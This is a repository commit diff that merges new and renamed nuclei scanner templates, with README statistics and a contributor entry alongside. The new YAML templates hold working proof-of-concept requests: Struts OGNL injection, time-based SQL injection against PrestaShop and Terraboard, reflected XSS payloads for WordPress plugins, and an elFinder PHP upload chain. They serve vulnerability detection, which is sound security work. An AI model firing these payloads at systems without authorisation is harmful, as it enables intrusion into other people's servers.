daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'projectdiscovery:master' into wordpress-plugins

patch-1
Ricardo Maia 2022-12-06 06:29:05 -03:00 committed by GitHub
parent 6e65fef701 300c2a8313
commit 75e38ef4e8
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
304 changed files with 6111 additions and 2541 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
.new-additions
View File

@ -1,3 +0,0 @@
exposed-panels/fastpanel-hosting-control-panel.yaml
technologies/payara-micro-server-detect.yaml
token-spray/api-giphy.yaml

22
README.md
View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1538 | dhiyaneshdk | 692 | cves | 1516 | info | 1631 | http | 4257 |
| panel | 755 | daffainfo | 662 | exposed-panels | 757 | high | 1141 | file | 78 |
| edb | 578 | pikpikcu | 340 | vulnerabilities | 518 | medium | 829 | network | 73 |
| xss | 537 | pdteam | 274 | misconfiguration | 350 | critical | 546 | dns | 17 |
| exposure | 536 | geeknik | 197 | technologies | 311 | low | 269 | | |
| lfi | 519 | dwisiswant0 | 171 | exposures | 301 | unknown | 25 | | |
| wordpress | 465 | 0x_akoko | 170 | token-spray | 235 | | | | |
| cve2021 | 366 | pussycat0x | 168 | workflows | 190 | | | | |
| wp-plugin | 360 | ritikchaddha | 161 | default-logins | 114 | | | | |
| tech | 349 | princechaddha | 153 | file | 78 | | | | |
| cve | 1551 | dhiyaneshdk | 701 | cves | 1528 | info | 1666 | http | 4323 |
| panel | 778 | daffainfo | 662 | exposed-panels | 780 | high | 1152 | file | 78 |
| edb | 582 | pikpikcu | 344 | vulnerabilities | 519 | medium | 835 | network | 77 |
| exposure | 551 | pdteam | 274 | misconfiguration | 361 | critical | 552 | dns | 17 |
| xss | 541 | geeknik | 206 | technologies | 319 | low | 281 | | |
| lfi | 519 | dwisiswant0 | 171 | exposures | 308 | unknown | 25 | | |
| wordpress | 470 | pussycat0x | 171 | token-spray | 236 | | | | |
| cve2021 | 369 | 0x_akoko | 170 | workflows | 190 | | | | |
| wp-plugin | 365 | ritikchaddha | 163 | default-logins | 116 | | | | |
| tech | 357 | princechaddha | 153 | file | 78 | | | | |
**314 directories, 4660 files**.
**321 directories, 4733 files**.
</td>
</tr>

2
TEMPLATES-STATS.json
View File

File diff suppressed because one or more lines are too long

4394
TEMPLATES-STATS.md
View File

File diff suppressed because it is too large Load Diff

20
TOP-10.md
View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1538 | dhiyaneshdk | 692 | cves | 1516 | info | 1631 | http | 4257 |
| panel | 755 | daffainfo | 662 | exposed-panels | 757 | high | 1141 | file | 78 |
| edb | 578 | pikpikcu | 340 | vulnerabilities | 518 | medium | 829 | network | 73 |
| xss | 537 | pdteam | 274 | misconfiguration | 350 | critical | 546 | dns | 17 |
| exposure | 536 | geeknik | 197 | technologies | 311 | low | 269 | | |
| lfi | 519 | dwisiswant0 | 171 | exposures | 301 | unknown | 25 | | |
| wordpress | 465 | 0x_akoko | 170 | token-spray | 235 | | | | |
| cve2021 | 366 | pussycat0x | 168 | workflows | 190 | | | | |
| wp-plugin | 360 | ritikchaddha | 161 | default-logins | 114 | | | | |
| tech | 349 | princechaddha | 153 | file | 78 | | | | |
| cve | 1551 | dhiyaneshdk | 701 | cves | 1528 | info | 1666 | http | 4323 |
| panel | 778 | daffainfo | 662 | exposed-panels | 780 | high | 1152 | file | 78 |
| edb | 582 | pikpikcu | 344 | vulnerabilities | 519 | medium | 835 | network | 77 |
| exposure | 551 | pdteam | 274 | misconfiguration | 361 | critical | 552 | dns | 17 |
| xss | 541 | geeknik | 206 | technologies | 319 | low | 281 | | |
| lfi | 519 | dwisiswant0 | 171 | exposures | 308 | unknown | 25 | | |
| wordpress | 470 | pussycat0x | 171 | token-spray | 236 | | | | |
| cve2021 | 369 | 0x_akoko | 170 | workflows | 190 | | | | |
| wp-plugin | 365 | ritikchaddha | 163 | default-logins | 116 | | | | |
| tech | 357 | princechaddha | 153 | file | 78 | | | | |

11
contributors.json
View File

@ -1368,5 +1368,16 @@
"website": "",
"email": ""
}
},
{
"author": "heywoodlh",
"links": {
"github": "https://www.github.com/heywoodlh",
"twitter": "",
"linkedin": "",
"website": "https://the-empire.systems",
"email": ""
}
}
]

3
vulnerabilities/other/devalcms-xss.yaml → cves/2008/CVE-2008-6982.yaml
View File

@ -13,10 +13,11 @@ info:
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cve-id: CVE-2008-6982
cwe-id: CWE-79
metadata:
verified: "true"
tags: devalcms,xss,cms,edb
tags: cve,cve2008,devalcms,xss,cms,edb
requests:
- method: GET

39
cves/2012/CVE-2012-0394.yaml Normal file
View File

@ -0,0 +1,39 @@
id: CVE-2012-0394
info:
name: Apache Struts Dev Mode OGNL Injection
author: tess
severity: critical
description: |
The DebuggingInterceptor component in Apache Struts before 2.3.1.1, when developer mode is used, allows remote attackers to execute arbitrary commands via unspecified vectors. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself."
reference:
- https://www.pwntester.com/blog/2014/01/21/struts-2-devmode-an-ognl-backdoor/
- https://www.exploit-db.com/exploits/31434
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0394
- http://www.exploit-db.com/exploits/18329
classification:
cve-id: CVE-2012-0394
metadata:
shodan-query: html:"Struts Problem Report"
verified: "true"
tags: ognl,injection,edb,cve,cve2012,apache,struts
variables:
first: "{{rand_int(1000, 9999)}}"
second: "{{rand_int(1000, 9999)}}"
result: "{{to_number(first)*to_number(second)}}"
requests:
- method: GET
path:
- '{{BaseURL}}/portal/displayAPSForm.action?debug=command&expression={{first}}*{{second}}'
matchers-condition: and
matchers:
- type: word
words:
- '{{result}}'
- type: status
status:
- 200

2
cves/2016/CVE-2016-10033.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2016-10033
info:
name: WordPress PHPMailer < 5.2.18 Remote Code Execution
name: WordPress PHPMailer < 5.2.18 - Remote Code Execution
author: princechaddha
severity: critical
description: WordPress PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a " (backslash double quote) in a crafted Sender property in isMail transport.

2
cves/2018/CVE-2018-14912.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2018-14912
info:
name: cgit < 1.2.1 Directory Traversal
name: cgit < 1.2.1 - Directory Traversal
author: 0x_Akoko
severity: high
description: cGit < 1.2.1 via cgit_clone_objects has a directory traversal vulnerability when `enable-http-clone=1` is not turned off, as demonstrated by a cgit/cgit.cgi/git/objects/?path=../ request.

2
cves/2019/CVE-2019-10232.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2019-10232
info:
name: Teclib GLPI <= 9.3.3 Unauthenticated SQL Injection
name: Teclib GLPI <= 9.3.3 - Unauthenticated SQL Injection
author: RedTeamBrasil
severity: critical
description: Teclib GLPI <= 9.3.3 exposes a script (/scripts/unlock_tasks.php) that incorrectly sanitizes user controlled data before using it in SQL queries. Thus, an attacker could abuse the affected feature

2
cves/2019/CVE-2019-12314.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2019-12314
info:
name: Deltek Maconomy 2.2.5 Local File Inclusion
name: Deltek Maconomy 2.2.5 - Local File Inclusion
author: madrobot
severity: critical
description: Deltek Maconomy 2.2.5 is prone to local file inclusion via absolute path traversal in the WS.macx1.W_MCS/ PATH_INFO, as demonstrated by a cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/etc/passwd URI.

2
cves/2019/CVE-2019-12725.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2019-12725
info:
name: Zeroshell 3.9.0 Remote Command Execution
name: Zeroshell 3.9.0 - Remote Command Execution
author: dwisiswant0,akincibor
severity: critical
description: Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters.

2
cves/2019/CVE-2019-13101.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2019-13101
info:
name: D-Link DIR-600M Authentication Bypass
name: D-Link DIR-600M - Authentication Bypass
author: Suman_Kar
severity: critical
description: D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices can be accessed directly without authentication and lead to disclosure of information about the WAN, which can then be leveraged by an attacker to modify the data fields of the page.

2
cves/2019/CVE-2019-13392.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2019-13392
info:
name: MindPalette NateMail 3.0.15 Cross-Site Scripting
name: MindPalette NateMail 3.0.15 - Cross-Site Scripting
author: pikpikcu
severity: medium
description: MindPalette NateMail 3.0.15 is susceptible to reflected cross-site scripting which could allows an attacker to execute remote JavaScript in a victim's browser via a specially crafted POST request. The application will reflect the recipient value if it is not in the NateMail recipient array. Note that this array is keyed via integers by default, so any string input will be invalid.

2
cves/2019/CVE-2019-15107.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2019-15107
info:
name: Webmin <= 1.920 Unauthenticated Remote Command Execution
name: Webmin <= 1.920 - Unauthenticated Remote Command Execution
author: bp0lr
severity: critical
description: Webmin <=1.920. is vulnerable to an unauthenticated remote command execution via the parameter 'old' in password_change.cgi.

2
cves/2019/CVE-2019-16313.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2019-16313
info:
name: ifw8 Router ROM v4.31 Credential Discovery
name: ifw8 Router ROM v4.31 - Credential Discovery
author: pikpikcu
severity: high
description: ifw8 Router ROM v4.31 is vulnerable to credential disclosure via action/usermanager.htm HTML source code.

2
cves/2019/CVE-2019-16662.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2019-16662
info:
name: rConfig 3.9.2 Remote Code Execution
name: rConfig 3.9.2 - Remote Code Execution
author: pikpikcu
severity: critical
description: rConfig 3.9.2 is susceptible to a remote code execution vulnerability. An attacker can directly execute system commands by sending a GET request to ajaxServerSettingsChk.php because the rootUname parameter is passed to the exec function without filtering, which can lead to command execution.

2
cves/2019/CVE-2019-3911.yaml
View File

@ -9,7 +9,7 @@ info:
- https://www.tenable.com/security/research/tra-2019-03
- https://nvd.nist.gov/vuln/detail/CVE-2019-3911
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-3911
cwe-id: CWE-79

2
cves/2019/CVE-2019-3912.yaml
View File

@ -10,7 +10,7 @@ info:
- https://www.cvedetails.com/cve/CVE-2019-3912
- https://nvd.nist.gov/vuln/detail/CVE-2019-3912
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-3912
cwe-id: CWE-601

2
cves/2020/CVE-2020-10546.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2020-10546
info:
name: rConfig 3.9.4 SQL Injection
name: rConfig 3.9.4 - SQL Injection
author: madrobot
severity: critical
description: rConfig 3.9.4 and previous versions have unauthenticated compliancepolicies.inc.php SQL injection. Because nodes' passwords are stored in cleartext by default, this vulnerability leads to lateral movement,

2
cves/2020/CVE-2020-10547.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2020-10547
info:
name: rConfig 3.9.4 SQL Injection
name: rConfig 3.9.4 - SQL Injection
author: madrobot
severity: critical
description: rConfig 3.9.4 and previous versions has unauthenticated compliancepolicyelements.inc.php SQL injection. Because nodes' passwords are stored by default in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.

2
cves/2020/CVE-2020-11991.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2020-11991
info:
name: Apache Cocoon 2.1.12 XML Injection
name: Apache Cocoon 2.1.12 - XML Injection
author: pikpikcu
severity: high
description: Apache Cocoon 2.1.12 is susceptible to XML injection. When using the StreamGenerator, the code parses a user-provided XML. A specially crafted XML, including external system entities, can be used to access any file on the server system.

2
cves/2020/CVE-2020-13700.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2020-13700
info:
name: WordPresss acf-to-rest-api <=3.1.0- Insecure Direct Object Reference
name: WordPresss acf-to-rest-api <=3.1.0 - Insecure Direct Object Reference
author: pikpikcu
severity: high
description: |

2
cves/2020/CVE-2020-13937.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2020-13937
info:
name: Apache Kylin Exposed Configuration File
name: Apache Kylin - Exposed Configuration File
author: pikpikcu
severity: medium
description: Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha have one REST API which exposed Kylin's configuration information without authentication.

2
cves/2020/CVE-2020-25213.yaml
View File

@ -4,7 +4,7 @@ id: CVE-2020-25213
# http://localhost/wp-content/plugins/wp-file-manager/lib/files/poc.txt
info:
name: WordPress File Manager Plugin Remote Code Execution
name: WordPress File Manager Plugin - Remote Code Execution
author: foulenzer
severity: critical
description: The WordPress File Manager plugin prior to version 6.9 is susceptible to remote code execution. The vulnerability allows unauthenticated remote attackers to upload .php files.

2
cves/2020/CVE-2020-25223.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2020-25223
info:
name: Sophos UTM Preauth Remote Code Execution
name: Sophos UTM Preauth - Remote Code Execution
author: gy741
severity: critical
description: Sophos SG UTMA WebAdmin is susceptible to a remote code execution vulnerability in versions before v9.705 MR5, v9.607 MR7, and v9.511 MR11.

2
cves/2020/CVE-2020-25506.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2020-25506
info:
name: D-Link DNS-320 Unauthenticated Remote Code Execution
name: D-Link DNS-320 - Unauthenticated Remote Code Execution
author: gy741
severity: critical
description: D-Link DNS-320 FW v2.06B01 Revision Ax is susceptible to a command injection vulnerability in a system_mgr.cgi component. The component does not successfully sanitize the value of the HTTP parameters f_ntp_server, which in turn leads to arbitrary command execution.

2
cves/2020/CVE-2020-2551.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2020-2551
info:
name: Oracle WebLogic Server Remote Code Execution
name: Oracle WebLogic Server - Remote Code Execution
author: dwisiswant0
severity: critical
description: |

37
cves/2020/CVE-2020-26248.yaml Normal file
View File

@ -0,0 +1,37 @@
id: CVE-2020-26248
info:
name: PrestaShop ProductComments < 4.2.0 - SQL Injection
author: edoardottt
severity: high
description: |
In the PrestaShop module "productcomments" before version 4.2.1, an attacker can use a Blind SQL injection to retrieve data or stop the MySQL service. The problem is fixed in 4.2.1 of the module.
reference:
- https://packetstormsecurity.com/files/160539/PrestaShop-ProductComments-4.2.0-SQL-Injection.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-26248
- https://packagist.org/packages/prestashop/productcomments
- https://github.com/PrestaShop/productcomments/security/advisories/GHSA-5v44-7647-xfw9
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H
cvss-score: 8.2
cve-id: CVE-2020-26248
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2020,sqli,prestshop,packetstorm
requests:
- raw:
- |
@timeout: 20s
GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- 'contains(body, "average_grade")'
condition: and

2
cves/2020/CVE-2020-35729.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2020-35729
info:
name: Klog Server <=2.41- Unauthenticated Command Injection
name: Klog Server <=2.41 - Unauthenticated Command Injection
author: dwisiswant0
severity: critical
description: Klog Server 2.4.1 and prior is susceptible to an unauthenticated command injection vulnerability. The `authenticate.php` file uses the `user` HTTP POST parameter in a call to the `shell_exec()` PHP function without appropriate input validation, allowing arbitrary command execution as the apache user. The sudo configuration permits the Apache user to execute any command as root without providing a password, resulting in privileged command execution as root. Originated from Metasploit module, copyright (c) space-r7.

2
cves/2020/CVE-2020-35846.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2020-35846
info:
name: Agentejo Cockpit < 0.11.2 NoSQL Injection
name: Agentejo Cockpit < 0.11.2 - NoSQL Injection
author: dwisiswant0
severity: critical
description: Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php check function. The $eq operator matches documents where the value of a field equals the specified value.

2
cves/2020/CVE-2020-35847.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2020-35847
info:
name: Agentejo Cockpit <0.11.2 NoSQL Injection
name: Agentejo Cockpit <0.11.2 - NoSQL Injection
author: dwisiswant0
severity: critical
description: Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php resetpassword function of the Auth controller.

2
cves/2021/CVE-2021-20114.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2021-20114
info:
name: TCExam <= 14.8.1 Sensitive Information Exposure
name: TCExam <= 14.8.1 - Sensitive Information Exposure
author: push4d
severity: high
description: When installed following the default/recommended settings, TCExam <= 14.8.1 allowed unauthenticated users to access the /cache/backup/ directory, which includes sensitive database backup files.

35
cves/2021/CVE-2021-3110.yaml Normal file
View File

@ -0,0 +1,35 @@
id: CVE-2021-3110
info:
name: PrestaShop 1.7.7.0 SQL Injection
author: Jaimin Gondaliya
severity: critical
description: |
The store system in PrestaShop 1.7.7.0 allows time-based boolean SQL injection via the module=productcomments controller=CommentGrade id_products[] parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-3110
- https://medium.com/@gondaliyajaimin797/cve-2021-3110-75a24943ca5e
- https://www.exploit-db.com/exploits/49410
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-3110
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2021,sqli,prestshop,edb
requests:
- raw:
- |
@timeout: 20s
GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(6)))xoOt) HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- 'contains(body, "average_grade")'
condition: and

2
cves/2021/CVE-2021-31682.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2021-31682
info:
name: WebCTRL OEM <= 6.5 Cross-Site Scripting
name: WebCTRL OEM <= 6.5 - Cross-Site Scripting
author: gy741,dhiyaneshDk
severity: medium
description: WebCTRL OEM 6.5 and prior is susceptible to a cross-site scripting vulnerability because the login portal does not sanitize the operatorlocale GET parameter.

4
cves/2021/CVE-2021-35587.yaml
View File

@ -16,8 +16,10 @@ info:
cve-id: CVE-2021-35587
cwe-id: CWE-502
metadata:
verified: true
fofa-query: body="/oam/pages/css/login_page.css"
tags: cve,cve2021,oam,rce,java,unauth,oracle
shodan-query: http.title:"Oracle Access Management"
tags: cve,cve2021,oam,rce,java,unauth,oracle,kev
requests:
- method: GET

2
cves/2021/CVE-2021-38751.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2021-38751
info:
name: ExponentCMS <= 2.6 Host Header Injection
name: ExponentCMS <= 2.6 - Host Header Injection
author: dwisiswant0
severity: medium
description: An HTTP Host header attack exists in ExponentCMS 2.6 and below in /exponent_constants.php. A modified HTTP header can change links on the webpage to an arbitrary value,leading to a possible attack

2
cves/2021/CVE-2021-40438.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2021-40438
info:
name: Apache <= 2.4.48 Mod_Proxy SSRF
name: Apache <= 2.4.48 - Mod_Proxy SSRF
author: pdteam
severity: critical
description: Apache 2.4.48 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user.

2
cves/2021/CVE-2021-41174.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2021-41174
info:
name: Grafana 8.0.0 <= v.8.2.2 Angularjs Rendering Cross-Site Scripting
name: Grafana 8.0.0 <= v.8.2.2 - Angularjs Rendering Cross-Site Scripting
author: pdteam
severity: medium
description: Grafana is an open-source platform for monitoring and observability. In affected versions if an attacker is able to convince a victim to visit a URL referencing a vulnerable page, arbitrary JavaScript content may be executed within the context of the victim's browser. The user visiting the malicious link must be unauthenticated and the link must be for a page that contains the login button in the menu bar. The url has to be crafted to exploit AngularJS rendering and contain the interpolation binding for AngularJS expressions.

52
cves/2021/CVE-2021-43421.yaml Normal file
View File

@ -0,0 +1,52 @@
id: CVE-2021-43421
info:
name: Studio-42 elFinder < 2.1.60 - Arbitrary File Upload
author: akincibor
severity: critical
description: |
A File Upload vulnerability exists in Studio-42 elFinder 2.0.4 to 2.1.59 via connector.minimal.php, which allows a remote malicious user to upload arbitrary files and execute PHP code.
reference:
- https://github.com/Studio-42/elFinder/issues/3429
- https://nvd.nist.gov/vuln/detail/CVE-2021-43421
- https://twitter.com/infosec_90/status/1455180286354919425
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-43421
cwe-id: CWE-434
metadata:
verified: "true"
tags: cve,cve2021,elfinder,upload,rce,intrusive
requests:
- raw:
- |
GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name={{randstr}}.php:aaa HTTP/1.1
Host: {{Hostname}}
Accept: */*
- |
GET /elFinder/php/connector.minimal.php?cmd=put&target={{hash}}&content={{randstr_1}} HTTP/1.1
Host: {{Hostname}}
- |
GET /elfinder/files/{{randstr}}.php%3Aaaa?_t= HTTP/1.1
Host: {{Hostname}}
Accept: */*
req-condition: true
matchers:
- type: dsl
dsl:
- 'contains(body_3, "{{randstr_1}}")'
- "status_code == 200"
condition: and
extractors:
- type: regex
name: hash
group: 1
regex:
- '"hash"\:"(.*?)"\,'
internal: true

2
cves/2021/CVE-2021-43778.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2021-43778
info:
name: GLPI plugin Barcode < 2.6.1 Path Traversal Vulnerability.
name: GLPI plugin Barcode < 2.6.1 - Path Traversal Vulnerability.
author: cckuailong
severity: high
description: Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability.

21
cves/2021/CVE-2021-44152.yaml
View File

@ -1,20 +1,25 @@
id: unauth-rlm
id: CVE-2021-44152
info:
name: Reprise License Manager 14.2 - Authentication Bypass
author: Akincibor
severity: critical
description: Reprise License Manager (RLM) 14.2 does not verify authentication or authorization and allows unauthenticated users to change the password of any existing user.
description: |
Reprise License Manager (RLM) 14.2 does not verify authentication or authorization and allows unauthenticated users to change the password of any existing user.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-44152
- https://reprisesoftware.com/admin/rlm-admin-download.php?&euagree=yes
- http://packetstormsecurity.com/files/165186/Reprise-License-Manager-14.2-Unauthenticated-Password-Change.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-44152
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-44152
cwe-id: CWE-287
tags: unauth,rlm,packetstorm
metadata:
verified: true
shodan-query: http.html:"Reprise License Manager"
google-dork: inurl:"/goforms/menu"
tags: cve2021,rlm,auth-bypass,packetstorm,cve
requests:
- method: GET
@ -23,13 +28,13 @@ requests:
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "RLM Administration Commands"
- type: status
status:
- 200
# Enhanced by mp on 2022/06/03

2
cves/2021/CVE-2021-45232.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2021-45232
info:
name: Apache APISIX Dashboard <2.10.1 API Unauthorized Access
name: Apache APISIX Dashboard <2.10.1 - API Unauthorized Access
author: Mr-xn
severity: critical
description: In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin.' While all APIs and authentication middleware are developed based on framework `droplet`, some API directly use the interface of framework `gin` thus bypassing their authentication.

43
cves/2022/CVE-2022-1883.yaml Normal file
View File

@ -0,0 +1,43 @@
id: CVE-2022-1883
info:
name: Terraboard < 2.2.0 - SQL Injection
author: edoardottt
severity: high
description: |
SQL Injection in GitHub repository camptocamp/terraboard prior to 2.2.0.
reference:
- https://huntr.dev/bounties/a25d15bd-cd23-487e-85cd-587960f1b9e7/
- https://nvd.nist.gov/vuln/detail/CVE-2022-1883
- https://github.com/camptocamp/terraboard/commit/2a5dbaac015dc0714b41a59995e24f5767f89ddc
- https://huntr.dev/bounties/a25d15bd-cd23-487e-85cd-587960f1b9e7
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2022-1883
cwe-id: CWE-89
tags: cve,cve2022,terraboard,sqli,huntr
requests:
- raw:
- |
@timeout: 10s
GET /api/search/attribute?versionid=*&tf_version=%27+and+(select%20pg_sleep(10))+ISNULL-- HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'duration>=5'
- type: word
part: body
words:
- '"page":'
- '"results":'
condition: and
- type: status
status:
- 200

46
cves/2022/CVE-2022-1916.yaml Normal file
View File

@ -0,0 +1,46 @@
id: CVE-2022-1916
info:
name: Active Products Tables for WooCommerce < 1.0.5 - Cross Site Scripting
author: Akincibor
severity: medium
description: |
The plugin does not sanitise and escape a parameter before outputting it back in the response of an AJAX action (available to both unauthenticated and authenticated users), leading to a Reflected cross-Site Scripting.
reference:
- https://wpscan.com/vulnerability/d16a0c3d-4318-4ecd-9e65-fc4165af8808
- https://nvd.nist.gov/vuln/detail/CVE-2022-1916
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-1916
cwe-id: CWE-79
tags: wordpress,wp-plugin,xss,wpscan,cve,cve2022,wp
requests:
- method: GET
path:
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=woot_get_smth&what={%22call_action%22:%22x%22,%22more_data%22:%22\u003cscript%3Ealert(document.domain)\u003c/script%3E%22}'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>alert(document.domain)</script>'
- type: word
part: body
words:
- 'woot-content-in-popup'
- 'woot-system'
- 'woot-table'
condition: or
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

43
cves/2022/CVE-2022-1933.yaml Normal file
View File

@ -0,0 +1,43 @@
id: CVE-2022-1933
info:
name: CDI < 5.1.9 - Cross Site Scripting
author: Akincibor
severity: medium
description: |
The plugin does not sanitise and escape a parameter before outputting it back in the response of an AJAX action (available to both unauthenticated and authenticated users), leading to a Reflected Cross-Site Scripting.
reference:
- https://wpscan.com/vulnerability/6cedb27f-6140-4cba-836f-63de98e521bf
- https://wordpress.org/plugins/collect-and-deliver-interface-for-woocommerce/advanced/
- https://nvd.nist.gov/vuln/detail/CVE-2022-1933
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-1933
cwe-id: CWE-79
metadata:
verified: "true"
tags: cdi,wpscan,cve,cve2022,wp-plugin,wp,wordpress,xss
requests:
- method: GET
path:
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=cdi_collect_follow&trk=%3Cscript%3Ealert(document.domain)%3C/script%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>alert(document.domain)</script>'
- 'Tracking code not correct'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

48
cves/2022/CVE-2022-2034.yaml Normal file
View File

@ -0,0 +1,48 @@
id: CVE-2022-2034
info:
name: Sensei LMS < 4.5.0 - Unauthenticated Private Messages Disclosure
author: imhunterand
severity: medium
description: |
The Sensei LMS WordPress plugin before 4.5.0 does not have proper permissions set in one of its REST endpoint, allowing unauthenticated users to access private messages sent to teachers
reference:
- https://wpscan.com/vulnerability/aba3dd58-7a8e-4129-add5-4dd5972c0426
- https://hackerone.com/reports/1590237
- https://wordpress.org/plugins/sensei-lms/advanced/
- https://nvd.nist.gov/vuln/detail/CVE-2022-2034
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2022-2034
cwe-id: CWE-862
metadata:
verified: "true"
tags: wp,disclosure,wpscan,cve,cve2022,sensei-lms,fuzz,hackerone,wordpress,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-json/wp/v2/sensei-messages/{{num}}"
payloads:
num: helpers/wordlists/numbers.txt
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'sensei_message'
- 'guid":{"rendered":'
